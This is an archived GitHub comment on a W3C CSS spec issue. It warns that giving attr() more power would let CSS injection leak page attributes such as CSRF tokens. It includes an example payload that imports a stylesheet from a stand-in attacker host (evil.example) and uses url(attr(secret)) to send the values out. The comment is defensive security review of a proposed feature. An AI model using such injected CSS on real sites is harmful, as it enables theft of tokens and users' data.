- From: arturjanc via GitHub <sysbot+gh@w3.org>
- Date: Fri, 29 May 2020 13:46:31 +0000
- To: public-css-archive@w3.org
> As there's no ability to concatenate in CSS, these would become a relative URL resulting in a request to the server that supplied the HTML (or, perhaps, the stylesheet, depending on the outcome of #5079). So you couldn't send a request just anywhere. That's a great illustration of the security issue this feature runs into: currently, browsers (at least Chrome and Firefox) resolve relative URLs based on the location of the stylesheet, not the loading document. So any CSS injection could just use `@import url(//evil.example)` and then in the malicious stylesheet exfiltrate the contents of all attributes on the page via `url(attr(secret))`, which would send requests to `evil.example/<attribute-value>`. Currently, attackers can still query against the contents of attributes with CSS3 selectors, but that's a single-bit information leak, requiring thousands of requests (and recursively adding new stylesheets to the page) to exfiltrate something like a CSRF token. This makes such attacks more difficult to conduct in practice, and makes them more time-consuming, increasing the chance that a user would navigate away from the page before the attacker can leak the secret. Giving `attr()` more capabilities as proposed here would allow direct exfiltration of all attribute values on a page with a single injected stylesheet, substantially increasing the security impact of CSS injections. I don't think disallowing this on certain elements is sufficient, given the large amount of data modern applications have in `data-*` attributes, URLs, and attributes on custom elements. The only safe solution I can think of would be to allowlist attributes such as `data-css-*`; of course existing use of `attr()` in the `content` property could be exempt from that. -- GitHub Notification of comment by arturjanc Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-635981234 using your GitHub account
Received on Friday, 29 May 2020 13:46:33 UTC